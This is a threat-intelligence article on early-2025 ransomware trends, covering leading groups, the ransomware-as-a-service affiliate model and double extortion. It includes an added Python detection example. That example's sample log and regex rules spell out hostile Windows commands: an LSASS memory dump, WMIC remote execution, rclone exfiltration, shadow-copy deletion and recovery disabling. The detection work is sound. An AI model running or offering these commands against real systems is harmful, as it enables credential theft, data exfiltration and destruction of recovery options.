In the first quarter of 2025, ransomware attacks have maintained an alarming trajectory, with threat actors adopting sophisticated strategies centered on data exfiltration and blackmail through leak site posts.
These attacks continue to follow the pattern of “if it ain’t broke, don’t fix it,” with established threat actors and newcomers alike focusing on proven revenue generation techniques.
According to recent intelligence, there were 80 active ransomware groups in Q1, with 16 new entrants since January 1, while 13 groups active in Q4 2024 have gone silent.
Manufacturing organizations remain the primary target, accounting for 22% of the 618 leak site posts containing victims’ industry information.
Business services followed at 11%, with healthcare and construction tied at 10% each.
The most prolific groups were Cl0p and RansomHub; Cl0p alone accounted for 413 leak site posts in Q1, 345 of them in February.
Rapid7 researchers noted a significant trend: ransomware groups are reinvesting their ill-gotten gains to acquire new exploitation tools.
Evidence from the Black Basta chat leaks in February revealed that ransomware groups are purchasing zero-day exploits, with one seller offering an unauthenticated RCE exploit targeting Ivanti Connect Secure for $200,000.
This reinvestment cycle fuels more sophisticated attacks and demonstrates the financial maturity of these criminal enterprises.
Initial access vectors vary widely but commonly include vulnerability exploitation, phishing campaigns, and compromised Remote Desktop Protocol (RDP) connections.
Once inside, attackers swiftly move to reconnaissance, credential theft, lateral movement, and ultimately, data exfiltration before deploying encryption payloads.
Some groups, notably LockBit, employ Living off the Land (LOTL) tactics, utilizing legitimate tools already present in victim environments to evade detection for weeks or months.
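The chain in the preceding paragraphs (initial access, credential theft, lateral movement, exfiltration, then encryption) is what a detection engineer has to reconstruct from endpoint telemetry, and LOTL tradecraft means the signal sits in the command lines of legitimate binaries rather than in a malware hash. The following Python is an added example, not code from Rapid7 or from this article: it runs a small set of process-creation rules over a constructed Sysmon-style log (hostnames, users, paths and timestamps are invented) and orders the hits into the stages the text describes. The rules encode widely documented LOLBin patterns (Office spawning a script host, LSASS dumping through comsvcs.dll, WMIC remote process creation, rclone copying to a remote, shadow-copy deletion and recovery disabling); they are generic illustrations chosen for this example and are not drawn from the report.

```python
import re
from dataclasses import dataclass

# Constructed sample log (not from any real incident): Sysmon Event ID 1
# process-creation records flattened to
# "timestamp|host|user|parent_image|image|command_line".
SAMPLE_EVENTS = r"""
2025-02-11T08:02:13Z|WS-114|CORP\jsmith|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|"WINWORD.EXE" /n "C:\Users\jsmith\Downloads\invoice.docm"
2025-02-11T08:02:40Z|WS-114|CORP\jsmith|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgA
2025-02-11T08:15:02Z|WS-114|CORP\jsmith|C:\Windows\System32\cmd.exe|C:\Windows\System32\rundll32.exe|rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\Windows\Temp\l.dmp full
2025-02-12T21:40:11Z|WS-114|CORP\svc_backup|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic /node:"FS-02" process call create "cmd.exe /c C:\ProgramData\u.bat"
2025-02-13T02:05:44Z|FS-02|CORP\svc_backup|C:\Windows\System32\cmd.exe|C:\ProgramData\rclone.exe|rclone.exe copy D:\Finance remote:bkp --transfers 16
2025-02-13T03:10:09Z|FS-02|CORP\svc_backup|C:\Windows\System32\cmd.exe|C:\Windows\System32\vssadmin.exe|vssadmin.exe delete shadows /all /quiet
2025-02-13T03:10:10Z|FS-02|CORP\svc_backup|C:\Windows\System32\cmd.exe|C:\Windows\System32\bcdedit.exe|bcdedit /set {default} recoveryenabled no
2025-02-13T09:00:00Z|WS-201|CORP\akim|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c dir
"""

# Stages in the order the article describes them; impact = encryption.
STAGE_ORDER = ["initial_access", "credential_access", "lateral_movement",
               "exfiltration", "impact"]


@dataclass(frozen=True)
class Event:
    ts: str
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


@dataclass(frozen=True)
class Rule:
    name: str
    stage: str
    image: str          # regex on the process image (case-insensitive)
    cmdline: str = ""   # regex on the command line, "" = any
    parent: str = ""    # regex on the parent image, "" = any


# Generic, widely documented LOLBin patterns (illustrative rule set).
RULES = [
    Rule("office_spawns_script_host", "initial_access",
         r"\\(powershell|cmd|wscript|cscript|mshta)\.exe$", "",
         r"\\(winword|excel|outlook|powerpnt)\.exe$"),
    Rule("lsass_dump_via_comsvcs", "credential_access",
         r"\\rundll32\.exe$", r"comsvcs\.dll.*minidump"),
    Rule("wmic_remote_process_create", "lateral_movement",
         r"\\wmic\.exe$", r"/node:.*process\s+call\s+create"),
    # Require a remote name (remote:path), not a drive letter (D:\path).
    Rule("rclone_to_remote", "exfiltration",
         r"\\rclone\.exe$", r"\b(copy|sync|move)\b.*\s[\w-]+:(?!\\)"),
    Rule("shadow_copy_deletion", "impact",
         r"\\(vssadmin|wmic)\.exe$", r"(delete\s+shadows|shadowcopy\s+delete)"),
    Rule("recovery_disabled", "impact",
         r"\\bcdedit\.exe$", r"recoveryenabled\s+no"),
]


def parse_events(text):
    """Parse the flattened records; malformed lines are skipped, not fatal."""
    events = []
    for line in text.strip().splitlines():
        parts = line.split("|", 5)   # keep any '|' inside the command line
        if len(parts) != 6:
            continue
        events.append(Event(*parts))
    return events


def matches(rule, ev):
    flags = re.IGNORECASE
    return (re.search(rule.image, ev.image, flags) is not None
            and (not rule.cmdline or re.search(rule.cmdline, ev.cmdline, flags) is not None)
            and (not rule.parent or re.search(rule.parent, ev.parent, flags) is not None))


def detect(text):
    """Return (timestamp, host, stage, rule_name) for every rule hit."""
    findings = []
    for ev in parse_events(text):
        for rule in RULES:
            if matches(rule, ev):
                findings.append((ev.ts, ev.host, rule.stage, rule.name))
    return findings


def reconstruct_chain(findings):
    """First sighting of each stage, merged across hosts, in kill-chain order."""
    first = {}
    for ts, host, stage, _ in findings:
        if stage not in first or ts < first[stage][0]:
            first[stage] = (ts, host)
    return [(stage, *first[stage]) for stage in STAGE_ORDER if stage in first]


if __name__ == "__main__":
    for stage, ts, host in reconstruct_chain(detect(SAMPLE_EVENTS)):
        print(f"{ts}  {host:<8}  {stage}")
```

Two benign records (Explorer launching Word, an analyst running `cmd.exe /c dir`) produce no hit, because each rule keys on the parent/child relationship or the argument string rather than on the binary alone; that distinction is what makes LOTL detection workable without flooding the queue. In the sample, exfiltration is seen on the file server an hour before the shadow copies are deleted, which is the ordering the text describes and the window in which egress monitoring can still interrupt the extortion.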
The double extortion approach has become standard practice across the ransomware landscape, with groups not only encrypting critical systems but also exfiltrating sensitive data and threatening to publish it on dedicated leak sites if ransom demands aren’t met.
These demands range from as little as $10,000 to upwards of $600,000, with payment deadlines varying from 48 hours to 90 days.
The Ransomware-as-a-Service Business Model
The cornerstone of modern ransomware operations is the Ransomware-as-a-Service (RaaS) business model, which has dramatically lowered the technical barrier to entry for cybercriminals.
This model separates ransomware developers from operators, creating an ecosystem where specialized skills are monetized efficiently.
The Lynx ransomware group exemplifies this approach with their comprehensive affiliate panel that allows partners to micromanage campaigns.
```javascript
// Double-extortion decision flow as the page sketches it: exfiltrate and
// encrypt first, then branch on whether the victim pays. The victim object
// supplies the methods; the outcome string is returned for the operator.
function runDoubleExtortion(victim) {
  if (!victim.hasValuableData()) return "skip";
  victim.exfiltrateData();
  victim.deployEncryption();
  if (victim.paysRansom()) {
    victim.provideDecryptor(); // May or may not be honored
    // Data deletion rarely occurs despite promises
    return "decryptor";
  }
  victim.publishToLeakSite();
  return "leaked";
}
```
The affiliate dashboard provided by groups like Lynx includes victim profile pages, operational news, updates, and an “all-in-one” archive of executables targeting multiple system architectures.
Affiliates typically receive 70-80% of any ransom payment, with the remainder going to the ransomware developers. This arrangement incentivizes widespread deployment while maintaining quality control over the malware itself.
Newer groups like Anubis have further evolved the model by incorporating malevolence-as-a-service elements, including journalism-style reporting on victims’ alleged security failings.
This additional layer of public shaming increases pressure on victims through carefully crafted social media campaigns designed to maximize reputational damage and force payment.
As ransomware operations continue to evolve technically and structurally, organizations must prioritize security fundamentals including multi-factor authentication, continuous patch management, and comprehensive attack surface monitoring to reduce their risk of becoming the next headline on a ransomware leak site.